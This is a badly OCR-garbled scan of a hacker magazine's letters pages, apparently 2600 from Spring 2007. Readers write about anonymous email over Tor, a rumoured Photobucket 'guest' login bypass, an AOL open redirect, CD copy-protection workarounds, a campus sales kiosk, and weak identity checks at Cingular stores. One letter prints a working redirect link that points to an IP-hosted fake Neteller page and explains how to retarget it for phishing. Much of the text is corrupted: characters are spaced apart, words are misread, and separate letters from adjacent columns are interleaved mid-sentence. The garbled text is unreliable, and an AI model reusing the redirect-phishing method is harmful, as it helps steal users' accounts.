Pri or to thi s I worked as l ead techni ci an for an
avi oni cs center where I deal t wi th several promi nent
ent i ti es i n aerospace.
My concern comes for both my safety, the secu
ri ty of my customers, and the fut ure of my career.
Can I wri te in anonymousl y? Does 2600 Magazine
protect its wri ters?
Name Del eted
.
Assuming that was your real name that you
signed your letter with, we'll start by encouraging
you to protect your identity at the source. We always
honor the requests of our contributors with regards
to identification and il is our policy not to reveal any
of our writers ' personal information without their
express permission. That said, we all must recognize
that there are potential risks whenever mail is sent
with idmtifying information which can be anything
trom thC rPlum address to information inadvertently
mcluded m the article which can lead people to
figure out who you are, particularly those in your
organization who may be trying to find the source
of a leak. So for those readers who worry about this
sort of thing, we advise raution with rC'gards to any
personal information that may be referenced in the
article (locations, encounters with other people,
etc. ) and details which could be gleaned from either
the email address itself or fr om the fact that someone
used their internal rorporate address to send mail to
someone at 2600. Often just the fact that contact
was made is enough to raise questions. Even without
knowing the contents of the email that user@evil
empire. mil sent to articles@2600. com, you can bet
the powers that he will be keeping a close eye on
the sender and preparing his interrogation chamber.
So the short answer is that we will do everything
to protect your identity. But you must also
exhibit a good degree of caution if you want to
preserve your anonymity.
Dear 2600:
Someti mes I want to send an anonymous ema i l
t o vari ous medi a organi zati ons a n d I want t o make
sure I ' m bei ng very anonymous. What I woul d do i s
go fi nd an i nsecure wi rel ess network, l i ke at a coffee
shop for exampl e, and connect to i t wi th my l aptop.
I wou l d open up Fi refox and make sure that al l of
my web traffi c went through Tor ( I wou l d use the
FoxyProxy extensi on for Fi refox, wi t h Fi refox, Tor,
and Pri voxy i nstal l ed on an Ubuntu system) . I woul d
then surf my way over t o hus hmai l . com and create a
new account . I wou l d choose Hushmai l because not
onl y are they a pri vacy organi zati on and are u n l i kel y
t o share any of my user i nformati on i f asked ( and i n
fact, accordi ng t o thei r webs i te, t hey don ' t actual l y
know any of my user i nformat i on wi thout my pass
phrase because of the way i t gets hashed), but al so
because i t has an SSL cert i fi cate and i t j ust makes
me feel safer, even if my traffi c is goi ng through Tor.
Then I wou l d log i n, emai l my message to the medi a,
and l og out. Then I woul d cl ear al l the pri vate data
l Fl refox ( my cache, h i story, cooki es, etc. ) . I woul d
securel y del ete al l fi l es i nvol ved wi t h t he message on
my computer ( I us e t he wi pe package). Al l t he whi l e,
I ' d make sure no one was l ooki ng over my shoul der.
Then I woul d turn off my computer and l eave.
Are there any hol es? I s there anyth i ng further I
shou l d be doi ng? I wou l dn' t spoof my MAC address
because my wi rel ess card does n' t al l ow i t, but i t
seems l i ke that woul dn' t even be necessary. C i s
i t ? Woul d i t be worth buyi ng a new wi rel ess card?
I s there any poss i bl e way that I cou l d get tracked,
by l ocal pol i ce, feds, Homel and Securi ty agents,
members of the medi a, or anyone el se?
A. Saboteur
We can say with assurance that the media lacks
the skills to do much beyond resolving an IP found
in the headers of your email. If you really want
t o test your system, sending a threat t o the White
House or announcing the grand opening of a new al
Qaeda chapter would get far more talented people
involved in the challenge. ( We really don't suggest
thiS method. ) Our readers can most certainly help
fmd any potential holes in your scheme. The one
we would point out is the danger of using the same
Page 34 2600 Magazine
email address for other communications since more
identifying information might be found if someone
were to somehow find multiple messages from the
same address, particularly any to a public forum.
Dear 2600:
In i ssue 23 : 4, I t hi n k vyxenangel ' s statements are
a l i ttl e mi sl eadi ng. I n the movi e Hackers, the char
acters i n the fi l m tal k about a " r i ghtous hack" on a
Gi bson and " not any of thi s acci dental shi t . " The fi l m
h a s very good vi sual effects bu t you don ' t l earn a
thi ng about hacki ng. The subway defense system I
thought was good. It was used by a young Angel i na
J ol i e, who pl ayed a hacker cal l ed Aci d Bur n. Don ' t
try thi s at home.
My questi on i s: I n the fi l m, the cover of your
magazi ne appears i n a scene. Do you know whi ch
i ssue t hey used i n the movi e?
mr.bitworth
We were hoping you could tell us since you've
obViously seen it somewhat recently. You can find a
full list of our covers on our website. It' most likely
one of the 1 994 covers and was used in the car
scene where one law enforcement agent is reading
lines from the famous "Hacker Manifesto" by The
Mentor, which, by the way never actually appeared
in our magazine. As for the original letter, we believe
a degree of sarcasm was part of the overall theme.
Dear 2600:
Twi ce now I have opened my cel l phone to
see I have a voi ce mai l and when I connect to my
mai l box and pl ay i t, I onl y hear musi c. No voi ce,
and my phone does n' t say I mi ssed a cal l . I pl ayed
the musi c for ten mi nutes the fi rst ti me and i t di dn' t
stop, though i t l ooped. I have Ver i zon servi ce. Can
anyone tel l me what on Earth i s goi ng on?
about:blank
Someone is calling you and playing music. It
happens. Sounds to us like you're getting some sort
of telemarketing call where they don't have enough
operators so they actually place people on hold when
calling them. It could be something else though,
like someone really trying to waste your time and
succeeding in wasting their own. The fact that your
phone doesn't ring could be because of a number
of reasons, including flaky service or someone
dialing directly into your voice mail greeting to avoid
ringing your phone. You should also be able to get
envelope information in the voice mail message that
may reveal an originating phone number. If there are
other possibilities, we will no doubt hear of them
from our readers.
once password-protected account. How does t hi s
work? And who has heard of i t ?
The Laguna
We're not familiar with it but this really sounds
a bit too simple to not be intentional or completely
untrue.
Dear 2600:
I wrote one an art i cl e in J anuary 2007 but I wrote
i t in Spani s h. I can transl ate i t but i t won' t be any
better than i f you transl ate i t. So I propose to send i t
t o you i n Spani s h and you can transl ate i t .
Vidor
You have a frightening amount of faith in our
abilities. Even if we did have the skills needed to do
this (and we don't), there simply isn't enough time to
translate languages on top of all of the other editing
tasks involved in a typical issue. That said, we would
be thrilled if someone could figure out a system of
translating submissions to us so that more people
from around the world could submit articles. Until
that happens, you're best of translating it as best
you can. Your grammar and spelling will probably
come out better than that of many native English
speakers.
Dear 2600:
Are art i cl es for 2600 sti l l accepted at
art i cl es@2600. com and i s a l i feti me subscri pt i on to
the magazi ne sti l l offered i f the art i cl e i s used?
d
That ' our address but we never ofered a lifetime
subscription for articles. You get a year and a shirt if
it's used. If the article is particularly in depth, then
you get two years and two shirts. Years can also be
applied to back issues.
Info
Dear 2600:
I am a l ong t i me l i stener and magazi ne subscri ber.
Li steni ng to and readi ng your recent el ecti on and e
vot i ng stori es made me thi n k I shoul d l et you know
how it works here i n Austral i a.
I f you ar e bor n here and go t o school l i ke normal
then when you turn 1 8 you are automat i cal l y added
to the l ocal el ectoral rol l and sent a l etter to confi rm
thi s, outl i n i ng your respons i bi l i ty to vote and al so
outl i ni ng the penal t i es for not voti ng. You t hen turn
up at the l ocal voti ng booth on E l ecti on Day, al ways
a Saturday from 8 to 6 at the l ocal school s . You wal k
i n through a few sprui kers handi ng out how-to-vote
cards for di fferent part i es and mosey on over to a
desk ( i f you get there at the ri ght ti me when there
Dear 2600:
is no queue) . They ask you your name and address,
I was wonder i ng i f any readers or i f anyone over
they ask if you have voted al ready today, they never
at 2600 has heard of the new " Photobucket Logi n"
as k for any | O, t hen t he ni ce vol unteer crosses your
expl oi t . Apparentl y t he expl oi t has t he abi l i ty t o turn
name out and hands you the vot i ng papers. You get
any Photobucket account i nto a "guest" account.
two papers: a l arge whi te one ( l ast el ecti on t hi s was
What t hi s means i s that upon t he l ogi n screen you
two feet wi de) and a smal l green one around the s i ze
woul dn't need the root password. Al l you wou l d
of a 2600 Magazine. You t ake your papers over to a
type i nto the password box is the word " guest" and,
cardboard booth and fi l l them out a l i ttl e awkwardl y,
boom, you now have " read onl y" pri vi l eges to the
then fol d them up i nto a square and pop them i nto
Spring 2007Page 35
cardboard boxes.
The ha l l ot papers are unreal . The whi te ( House)
one has about 30 to 50 boxes to fi l l out wi th
numbers start i ng wi th one for your fi rst vote, then
you keep goi ng wi th the second and so on . . . or you
can j ust put a one i n the top sect i on of the paper for
the party you want and you wi || get whatever that
party has chosen for i ts preferences. As you can see,
t hi s has i ts own probl ems wi th preference deal s and
the l i ke.
There i s another l egal vote. That i s, i f you j ust
put a one i n one box for one candi date onl y, then
that wi l l be counted but onl y i n the fi rst round.
When your choi ce i s among the l owest pi l e of votes
then your vote wi || be di scarded wi th no prefer
ences. Normal l y i t woul d then go to number two,
then three, and so on unt i l there were onl y two pi l es
of votes and a wi nner was decl ared. Whi l e thi s i s
a l egal vote, i t i s a federal offense to actual l y l et
anyone know about i t. Peopl e have been arrested for
handi ng out how to vote cards that promote thi s type
of vote . . . . The green ( Senate) paper is much si mpl er
wi th onl y fi ve to seven boxes to number.
The probl em wi th the preferent i al vot i ng system
is that my vote wi l l al ways end up wi th one of the
two maj or parti es i n most cases and not al ways the
one you prefer, unl ess you fi l l out every box on the
paper and put that candi date l ast.
The system i s open to many si mpl e hacks but i t
does n' t real l y happen to any extent. There are a l ot
of unfi l l ed papers and i nval i d votes tbough.
Breto
The system you describe is known as Instant
Runoff voting. Basically it saves the trouble of having
to hold multiple elections, otherwise known as
runoffs, to determine who the ultimate winner is.
This system is used in some parts of the United States
and may catch on in the future. Most people seem
intimidated by it because of its seemingly complex
nature.
Dear 2600:
I ' m wr i t i ng t hi s in regard to "Ri ngtone Down
l oad Fol l i ez" from 23: 3. I was eager to try thi s out
but every ri ngtone I saw that I wanted was stored
in a . swf fi l e. I di d some research on . swf f i l es and
found t hat t hey were mul ti -part, meani ng t hat t he
ri ngtone was stored somepl ace other than the . swf
fi l e i tsel f. So I got on Fi refox, enabl ed the l i ve http
headers add-on, checked the request box, and
rel oaded the . swf page. I then checked |i ve http
headers and found exactly where the musi c fi l e was
stored ( e. g. , http://content.ringtonio.nl/
"swfp/STREA21 1 7 5 . SWF) . Then I saved the
page and changed the fi l e from swf to mp3 wi th a
free fi l e converter. I hope t hi s hel ps.
Al so, 23: 3 was the fi rst 2600 Magazine I ' ve
gotten . My s i ster knew I l oved computers so she got
it for me. We were both astoni shed when we saw my
ol d sma l l town el ementary school on the back cover
( Mountai n Vi ew E l ementary School , Manchester,
GAl . I now have a subscri pti on and l ook forward to
fut ure i ssues!
Daniel moore
It certainly is a small world, isn't it?
Dear 2600:
I n response to l upO' s l etter i n 23: 3 about concern
for potent i al privacy i nfri ngements made by Cox
Communi cati ons, I woul d l i ke to share what l i ttl e I do
know about how most of these "copyri ght i nfri nge
ments" are handl ed. Fi rst of, I worked for Cox for
over two years as a l owl y techn i cal s upport agent
handl i ng cal l s from every l ast J i m-Bob and Cl etus i n
the area about t hei r I nternet servi ce, s o l et' s j ust say
the mandatory beforehand experi ence requ i rements
for empl oyment were not very i mpressi ve. But i n a l l
truthfu l ness, most of t h e fl oor agents are gi ven a n
absurd amount of run-around when aski ng a n y ques
t i ons that deal t with the worl d outsi de of the cube. If
a customer cal l ed in compl ai ni ng of nonfuncti oni ng
servi ce, we woul d pul l up thei r account and noti ce
that i t had been "fl agged" by the corporate offi ce i n
Atl anta. The next step woul d be t o access another
web-based uti l i ty that al l owed us to see al l types of
i ssues rel ated to the customer's account categor i zed
by modem MAC. I n the case of "copyri ght i nfri nge
ment, " there woul d actual l y be a copy of a facs i mi l e
from t he correspondi ng entertai nment congl omerate
( i . e. , Warner Brothers, Fox, etc. l . l t woul d be a si mpl e
l etter from the company' s l egal team i nformi ng Cox
of the copyri ght i ssues. They woul d never go i nto
detai l , but woul d al ways say somethi ng humorousl y
nonchal ant about " happeni ng to noti ce" or some
crap l i ke that. They woul d then present Cox wi th the
condi ti ons for handl i ng the customer's account. They
woul d request that the customer be i nformed of the
i nfri ngement and gi ven noti ce that servi ce woul d be
termi nated upon another vi ol at i on. They wanted two
stri kes and you're out, but the general r ul e was t hree.
I tri ed i nvesti gati ng i nto thi s as much as poss i bl e but
no one seemed to have a cl ue about how they found
out or di dn' t seem t o care. And unfortunatel y most
snoopi ng was di ffi cul t wi th the constant physi cal
moni tori ng and the ever watchful screen capture
software that, for some reason, they frowned upon
bei ng di sabl ed. Now I am no l onger empl oyed
there and so I don' t have access to eas i l y research
anymore. And, by the way, a si mpl e I P address
anonymi zer seems to be an easy way around t hi s. I
never saw any i ssues ari se from peopl e that I knew
to be usi ng such software. And 2600 staf, t hanks for
a conti nual l y great publ i cat i on.
NOvusOpiate
Dear 2600:
A week or so ago from Borders I bought a Bad
Rel i gi on CD cal l ed Punk Rock Songs. The CD was an
i mport from Germany t hat i ncl uded many obscure
tracks that I real l y real l y wanted. When I got home
and popped i t i nto my Xbox to burn and make my
personal copy, the di sc woul dn' t pl ay. I t was l abel ed
i n German that it "wi l l not pl ay i n a PClMac." As the
Xbox i s j ust a dressed up |C, I ki nda got paranoi d,
Page 36 2600 Ma
g
azine
rememberi ng that si tuati on where Sony got sued for
spyware that bur i ed i tsel f i n root. So I woul dn' t even
consi der pl aci ng i t i nto my computer to bur n. I got
to thi nki ng of al ternati ve methods to get the i nforma
t i on cut i nto my l ega l l y protected ri ght for personal
copi es of musi c. Pl us I al ways bur n a copy j ust i n
case the ori gi nal becomes i noperati ve.
I ' m not that fami l i ar wi th the copy protecti on
software from Sony and I wanted to keep i t quar
ant i ned from my box. I j ust wanted to fi nd a way to
create hi gh qual i ty copi es of the musi c from the CD
onto my hard dr i ve. Then i t dawned on me. Use a
portabl e CD pl ayer and a doubl e ended headphone
j ack cord you can fi nd at Radi o Shack ( 1 /8th stereo
mi ni pl ug to 1 /8th stereo mi ni pl ug) and a program
l i ke Audaci ty, whi ch is used to record your audi o
i nput, as most medi a pl ayers don ' t qui te do that
anymore (http://audacity . sourceforge.
net/ I
I t's extremel y s i mpl e. You connect the " l i ne out"
on the CD pl ayer (or even the headphone out) to
the cord. You connect that cord to the back of your
computer at t he " audi o i n. " Pl ay t he CD and us e the
program to record the tracks. I t's a hardware vari ety
bypass of the copy protecti on software on the CD.
Many peopl e I fi gure al ready know about t hi s,
but I fel t l i ke i nfor mi ng t he masses about a bypass
of a l l secur i ty devi ces on a copy protected CD (so
you can essenti al l y quaranti ne the di sc as I don ' t
trust a Sony di sc i n my dri ve) . I t does n' t matter what
program i s used to protect the CD as you are j ust
recordi ng the audi o goi ng i nto the computer and i t's
bei ng pl ayed i n a "dumb" CD pl ayer so it wi l l bypass
the code that prevents i t from bei ng pl ayed on the
computer dr i ve. My computer i s anci ent but I have
t hi s feel i ng that the same can be done wi t h outsi de
vi deo sourced from RCA j acks or cabl e or whatever.
Of course there are software ways to do t hi s, but I
wanted to remi nd peopl e that there are hardware
ways to get these t hi ngs accompl i shed as wel l .
Rae
Dear 2600:
I ' m a phi l osophy student at Mount Al l i son
Uni versi ty i n New Brunswi ck, Canada, and an avi d
reader of 2600. Recent l y my school swi tched di ni ng
servi ces from Sodexho to Aramark, and wi t h the
changes came an i nterest i ng l i ttl e novel ty hi dden
away i n the corner. They i nstal l ed a l i ttl e computer
cal l ed the Pi oneerPOS ( Poi nt Of Sal e i s my guess) .
Thi s i s offi ci al l y for nut ri t i on i nformati on and a menu
for the week. Al so offi ci al l y ( al t hough somewhat
unadvert i sed for now), i t ' s used for buyi ng snacks
from Aramark. Aramark has the food monopol y on
campus and so any food sol d on the campus i s from
them.
I happened to be eat i ng near it when I noti ced
there was a t i ny box on the touch-sensi t i ve di spl ay.
There was a program update for " GoToMyPC" whi ch
i s used for remote access. Al though t hi s i s a guess,
I thi n k that the program takes the sal es from the
machi ne and sends them to the central corporate
headquarters, whi ch then orders the out l ets what to
do. Anyhow, I cl i cked the box and i t rebooted the
machi ne, whi ch l ed to a weal th of i nformati on. The
motherboard i s Ameri can Megatrends and the OS
i s Wi ndows XP Embedded. I t booted to the desktop
and I navi gated the touchscreen wi t h a pen cap
( fi ngers woul d be too di ffi cul t and i t was necessary
to get the tool bar from "auto- hi de" l .
I checked the programs i t had i nstal l ed, whi ch
were CampusDi shKi osk, GoToMyPC, and Norton
Ant i vi rus. I t al so had Wi ndows Medi a Pl ayer 1 0
and the defaul t songs that come wi th X P ( Davi d
Byr ne cranked up l oud on t hi s mach i ne was qu i te
humorous) . The machi ne was three gi gahertz and
had 1 . 99 gi gs of RAM, whi ch seems l i ke i ncredi bl e
overk i l l for a machi ne t hat i s more or i ess termi nal .
I t was connected t o t he campus network, s o I had
no way to i denti fy exact l y where the i nformati on
obtai ned on thi s computer went. There were two
hard dri ves, one of whi ch hel d the system i nforma
ti on and one that hel d two . GHO fi l es. One dri ve
was roughl y 700 MB and the other was about 1 . 2
GB.
I ' m not exact l y sure what i nformati on i s on that
machi ne. However, from my l i ttl e i nvesti gati on, I
gather it wou l dn' t be too di ffi cul t to di g i nto actual
student numbers and purchases, ass umi ng the i nfor
mati on is i n i t i al l y stored on one of the hard dri ves.
Thi s makes me rather paranoi d about the way these
card-swi pe uni ts are used. Mount Al l i son i s new
to usi ng magnet i c stri pe I Ds and I worry that the
machi nes i t wi l l be uti l i zi ng now and i n the future
wi l l conti nue to be i nsecure and vul nerabl e.
Thanks for a great mag!
Local Lumi nary
Dear 2600:
I am a new subscri ber to your magni fi cent maga
zi ne, enj oyi ng the extended access to new technol o
gi es t hrough you and Maximum PC, and a res i dent
of Pennsyl vani a' s D. O. C. I ' m wri ti ng i n response to
soursol es' l etter concerni ng AI M rel ay for pri soners.
The rumor of I nternet access i n pri sons, Pennsyl
vani a' s at l east, i s j ust that. A rumor. Unl ess an educa
ti onal course requ i res i t, i nmates aren ' t permi tted
to see a computer, l et al one touch one. What l i ttl e
access I have had has shown a bas i c network wi th
no I nternet access. Secur i ty i s surpri s i ngl y l ax but I
att ri bute t hi s to the bas i c i nmate popul at i on bei ng
your usual Layer 8 i di ots. Shou l d I come across
somethi ng wi t h potent i al I ' l l be sure to share.
The phone system i tsel f was upgraded t o an auto
mated system some t i me back. Si nce the upgrade,
al l phone numbers are pre-approved before cal l s are
permi tted. Even then cal l s are l i mi ted to one or two a
day, dependi ng on your custody l evel . Cal l i ng cards
are an opti on. Thi s i s j ust a credi t to your account
wi t h the phone company, not an actual card. Unfor
tunatel y the cheapest card for us is the equi val ent
of a mi ni mum wage empl oyee on the street payi ng
$375 for a 40 mi nute card. That is whol e other can
of worms though.
Spring 2007Page 37
I appreci ate your efforts i n tryi ng to ai d fami l y/
fri ends of the i ncarcerated. It al most remi nds me of
what i t ' s l i ke to be amongst peopl e agai n.
Thank you 2600 for your noti ce of t he need for
change. Most peopl e woul d sooner forget about us
and our fri ends and fami l i es t han hel p speak out
about i nj usti ces we endure.
SN
In recent months there has finally been attention
given to the horribly unfair telephone rates forced on
prisoners and their families. We have a very unhealthy
attitude of forgetting about our incarcerated citizens
and, in fact, treating them as if they were subhuman,
regardless of the actual circumstances behind their
imprisonment. As more and more of us are found
guilty oone thing or another, this mentality is really
going to wind up biting us in the ass.
Stories
Dear 2600:
My boss is a "sysadmi n" in our department.
Unfortunatel y, I ' m the "ass i stant. " I wou l d l i ke to
share thi s short but funny story. I was brows i ng
around hi s fi l es on t he network t he other day, whi ch
he hasn ' t restr i cted access t o, and found a very short
document deta i l i ng the i mpl i cati ons of unauthor
i zed access to our onl y UNI X server us i ng the root
account.
The document i s so short i t i s funny. My boss
knows zero about UNI X, and i t appears he thi nks no
one el se does ei ther! Here are hi s statements:
" Root cannot be accessed remotely you need
to he in front of the serwr. " (A modem i s hooked
up to the server and i s cl ear l y vi si bl e) . " To do any
damage on t he UNIX server using the root account,
you would need a good understanding of UNIX. "
Anyway, keep up the great work wi th the mag,
Ol "e Hook, and Of te Wall.
bri l l (England)
It s not hard to Sfe how someone could reach
these cOIc/usiolJS. Lots of servers don't permit
remote logins to root. But of course you can still
become root remotely in a numher of ciferent ways,
authoriZ'd and unauthorized. Not knowing t his may
give someone d false scnse of security. But it ' a lot
harder to fure out how someone could think tllt
you can only s("ww something up by having a good
understanding o|it. If anything, the opposite is true.
Dear 2600:
A few months ago I wandered i nto a Ci ngul ar
retai l l ocati on a n d wanted t o fi nd out how much
i nformati on about my account they had access t o.
| acted as i f I wanted t o pay my bi l l and had some
other quest i ons about my account. I tol d one of the
sal es reps my cel l number and he punched i t i nto
the computer and up care al l of my i nfo, i ncl udi ng
my address, date of bi rth, l ast four di gi ts of my Soci al
Securi ty Number, and cal l h i story. I watched the
screen as he l ooked at my account. Unfortunatel y,
the rep di dn' t even know who | was s i nce he di dn' t
as k me t o i dent i fy mysel f nm di d he ask for t he pass-
code I expl i ci t l y tol d Ci ngul ar to put on the account
when I fi rst got servi ce. More astoni s hi ngl y, the pass
code was di spl ayed i n pl ai ntext on the computer
screen i n red col or! I assume he was supposed to
ask me to confi rm it. Oops.
Di sturbed by t hi s, I next went to one of the
Ci ngul ar franchi se stores i nstead of a corporate store
l i ke the fi rst one. Agai n, I s i mpl y sai d I had some
questi ons about my account, gave the woman my
cel l number, and she pul l ed up the record and
a l l owed me t o l ook at i t. She di dn' t ask who I was or
confi rm any account i nformati on or the passcode.
The onl y di fference was the l ook of the web-based
appl i cati on she was usi ng, and the fact that she did
ask for my zi p code when she fi rst punched i n the
cel l number. Recent l y I found out that the franchi se
stores now need to put i n the l ast four di gi ts of the
SSN to access the account. Sti l l , the passcode i s
di spl ayed i n red for them to see.
I ' m real l y di sappoi nted to see t hi s easy avai l
abi l i ty of my cel l phone records, especi al l y after the
scandal l ast year i n whi ch anyone coul d pay $ 1 00
to get a cal l hi story through pretext i ng. I di dn' t even
have to pretext to get t hi s i nfo. I coul d' ve been anyone
goi ng i nto the stores and gi vi ng them any phone
numher s i nce they di dn' t ver i fy my i denti ty. Then I
coul d' ve cal l ed customer support wi th the passcode
that I coul d see onscreen and do whatever I wanted.
The bi g questi on is why does an i n-store sal es rep
even need access to accounts that have al ready been
set up? Thei r j ob i s to sel l and acti vate new phones.
They coul d sti l l accept bi l l payments wi thout havi ng
access t o exi st i ng customer accounts. Al l owi ng i n
store sal es reps t o have account access i s much l ess
secure t han havi ng that i nfo avai l abl e onl y i n a cal l
center. For one, the i nteracti on i s n' t bei ng recorded,
and the store reps are open to br i bi ng, whereas cal l
center reps are much l ess l i kel y t o be abl e to accept
bri bes due to l ogi sti cal reasons.
On the Ci ngul ar webpage they state:
"As you may have read or seen in the media, a
number of web sites are advertising the availahility
for sale of wireless phone records. Please know that
CingulaI' |ite|ess doCs not sell customer information
to, or otherwise cooperate with, theSt companies,
and we are working aggressively to combat their
practices. . .. Cingular is supporting efforts to crimi
nalize the unauthorized acquisition or sale of wireless
phone records. In addition, CingulaI has a variety of
safeguards in place to protect agailSt unauthorized
access to customer information, and we continue to
evaluate and enhance these safeguards. If you wish
to hetter protect your account from unauthorized
dCCC55, contact us at / -866-ClNCULAR ( / -866-246-
48S2) and ask that a passcode be placed on your
dccount.
|l
Wel l , t hey can start the cri mi nal i nvesti gat i on
wi th t hei r own i n-store sal es peopl e.
As a si de note, I a l so saw a sma l l col ored graph
of some ki nd on my account ' s mai n page, whi ch
i ndi cated how much revenue I brought i n rel ati ve
to other customers. I asked the rep what it was and
Page 38 2600 Magazine
t hat ' s when he got upti ght and sai d I wasn' t even
s upposed to be l ooki ng at the computer. I guess t hi s
graph tel l s cal l center reps how va l uabl e I am as a
customer.
Dave
As long as there are human beings in the equa
tion, security holes like this are going to exist in one
form or another. Education, not automation, is the
answer.
Dear 2600:
I am 1 8 years ol d and have been a reader for
many years. There aren' t any meet i ng pl aces cl ose
to me so I have never been abl e to attend. Today I
recei ved my l etter of acceptance to the Un i versi ty
of Fl or i da. When I was readi ng the meet i ng pl ace
page I was rea l l y exci ted when I saw that there i s a
meet i ng on the UF campus. Now I can ' t wai t unt i l
August. Thanks for such a great read!
Kevi n
Many college applicants choose their college
based on whether or not there's a 2600 meeting
nearby. It makes perfect sense to us.
Dear 2600:
I recentl y renewed a domai n name. I cal l ed
the company i nstead of dea l i ng wi t h i t onl i ne due
to compl i cati ons that I won' t go i nto. I recei ved a
tel l er who was l ocated i n the Phi l i ppi nes. I ended up
cal l i ng t hi s company three t i mes. The fi rst and l ast
cal l s were deal t wi th t hrough the Phi l i ppi nes offi ce
and the second cal l was t hrough a mai n offi ce i n
Pennsyl vani a.
The domai n name was t o be pai d for by an author
I work wi t h. The tel l er i n Pennsyl vani a wanted to
speak wi t h the author i n order for the renewa l to
be processed whereas the tel l er i n the Phi l i ppi nes
bypassed t hi s and si mpl y cal l ed me wi th the number
they had on record to veri fy I was affi l i ated wi th the
account on record after I answered the phone.
The number they had on record was for a l and
l i ne account that forwards cal l s to my mobi l e. I
found t hi s an i nteresti ng mi ni -system that veri fi ed
trust between mysel f and thi s l ady i n the Phi l i p
pi nes. I t al so showed me (as I ' ve exper i enced many
ti mes before wi t h tel ecommuni cati ons compani es)
the pol i cy i nconsi stenci es wi t hi n the same company
scattered around regi ons from one si de of the pl anet
to the other.
Somehow i n some bi zarre way t hi s rel ates to
why I get so many requests from Ph i l i ppi ne gi r l s at
Fri endster, whi ch i s why | even bother keepi ng the
account open!
J Z
Danger
account wi th a company I don ' t have an account
wi th, but t hi s one was di fferent. I i nspected the l i n k
that was sent i n the emai l . I was s urpr i sed t o see
that the l i n k started wi t h www. aol . com. Many users
unfami l i ar wi t h phi s hi ng mi ght l ose thei r account i n
t h i s type of phi s hi ng attempt because of t h e fami l i ar
www. aol . com address. Thi s phi sh i ng attempt uses a
redi rect feature conveni entl y provi ded by AOL. At
t hi s t i me I am unabl e to expl ai n the extensi ve use of
numbers and commas.
http://w. aol.com/ams/
clickThruRedirect . adp? 1 0 7 3 7 621 0 0 , 214
7 7 79757 %D7214756841 3,https://202. 143
. 1 32 . 1 79/w. neteller . com/index . html
As of thi s wr i t i ng the AOL redi rect is sti l l wor ki ng.
Si mpl y change the l i n k after the l ast comma and you
can redi rect to any page you l i ke.
So, you ask, what i s the probl em? The probl em
comes when a mal i ci ous user wants to phi sh for
AOL accounts. If a mal i ci ous user sets up an AOL
type l ogi n page, thi s type of attack coul d be very
successful .
I emai l ed admi n@aol . com regardi ng t hi s i ssue
and, as expected, recei ved no response. Hopefu l l y
by provi di ng t he i nformati on t o t he masses t he secu
r i t y i ssue wi l l eventua l l y be resol ved.
dNight
Dear 2600:
I ' m not exactl y sure i f t hi s l etter is rel evant .. But
I thought t hi s was so stupi d I had t o ment i on i t . .
Congress i s tryi ng t o pass a l aw cal l ed the Ani mal
Enterpri se Terror i sm Act (AHA) and i t has one very
very very seri ous probl em. If t hi s law were to pass
i t woul d make l egal acti vi t i es such as peacefu l
protests, consumer boycotts, medi a campai gns,
l egi sl ati ve proposal s, or even tel l i ng the publ i c what
happens i n puppy mi l l s, factory farms, or canned
hunt i ng faci l i t i es, abl e to be cl assi fi ed as acts of
terror i sm. Whatever happened to free speech? The
r i ght of peaceful protest? Sure, t hi s real l y has nothi ng
t o do wi t h hacki ng. But i t does deal wi t h suppressi on
of our basi c r i ght s. So I thought I ' d wr i te i n a smal l
l etter about i t because I bel i eved i f anyone wou l d be
open mi nded enough to care, they' d probabl y read
t hi s magazi ne.
ch3rry
This was signed into law on November 27, 2006.
Regardless of whether you believe that this will crim
inalize free speech or whistleblowing, it seems a bit
of a reach to inject the word "terrorism" into this
topic. That right there should have been enough to
derail this.
Weirdness
Dear 2600:
Dear 2600:
Has anyone el se recei ved anyth i ng l i ke t hi s ? It
I recentl y received an ema i l that was an obvi ous
appears to be some sort of garbl ed r ant about tech-
phi s hi ng attempt. The ema i l asked me to l og i nto
nol ogy . . . but the attached i mage [ mutual l y. gi l l at
my Netel l er account. The probl em i s, I don ' t have
the bottom has maku. ob on i t. . . whi ch is the tradi ng
a Netel l er account. I ' ve recei ved many of these
symbol for makeup. coml i mi ted. I am guess i ng t hi s i s
types of emai l s i n the past aski ng me to l og i nto my
j ust a way to bypass spam fi l ters. Any thoughts?
Spring 2007Pa
ge 39
---------- Forwarded message
----------
From: Ambrose Hartman <clyh(resourceaz. com>
Date: Dec 4, 2006 2 : 1 6 AM
)uhject: Punch
-
card ballots, optical
-
scan ballots,
and absentee ballots are all subject to qu(stion.
We all use it for the same thing, talking, commu
nicating, and connecting. Their intent is also to
launch attacks against major companies, and now
attack each other. What have they and their parents
learned from everything?
My phone works perfectly for what I do.
7he only fault with this nedr utopian situation
is that computers newr, ever, ewr, act the way we
Ivant them to.
Computers dre popping up everywheff', the
world is b,coming wirc,less, and now you can do
almost ('wry thing online. This all has me completely
sick of elections.
drl ecter
7his is apparently the latest craze in spam. Text is
grabbed from websites, onlinc books, news stories,
and even weather reports and then sent out tn an
email to various people. Most 'pam detectors won't
catch this since the text appears to be legitimate. The
spam is then included in attachments (image files,
h,'nce the term "image spam"), which people to this
day still open blindly
Advice Sought
Dear 2600:
We' re a group of young hackti vi sts from Canada
and we are goi ng to be start i ng our own pri nted mag.
We' re goi ng to be breaki ng ground wi th some top
notch drti cl es and I ' m sure a few of our art i cl es wi | |
menti on 2600. When they do, I ' l l emai l you agai n
t o l et you know, as we woul d l ove t o reference and
tel l peopl e about your mag. Here' s the t hi ng: I am
i nterested i n hear i ng a short story about how 2600
got started and put on the stands a l l over. Any t i ps?
Thanks i n advance for the advi ce.
Alexander Chase
It sure wouldn't be a short story The thing about
starting a magazine is that it takes a really long time
to develop from scratch. We began very small and
grew to a size we were comfortable with. 7hat ' the
most important bit of knowledge we can share WIth
any nCw publication. If you start too big, you will
hrn yourselves out and go brok< in the process.
That 's assuming you aren 't already big with lots of
money to invest. But then you're not really a zine.
The key is patience and determination, coupled with
d good dose of insanity. We wish you luck and look
forward to seeing what you come up with.
Folowing Up
Dear 2600:
I j ust real i zed upon Googl i ng my past screen
names that a l etter I wrote a whi l e ago was publ i shed
i n you r magazi ne but I di dn' t recei ve my free
subscri pti on ! Thi s is probabl y because I stopped
checki ng my l ast emai l address and moved on to
other emai I s.
Marcio
It's also probably because we don't offer free
subscriptions for lettt'rs. Look at how many letters
we gefl We would go bankrupt extremely fast. We
offer free subscriptions for articies, which generally
go into far more detail than letters. however, you
were to send /l5 a two paragraph artcle and expect
a free subscription for that (as many do) , it would
likely glt converted into a letter if it were to get
printed at all.
Dear 2600:
J ust a qui ck update to the arti cl e " Hackti vi sm i n
the Land Wi thout a Server. " I ' ve hedrd from someone
who went a l l the way t hrough that you ' l l have to
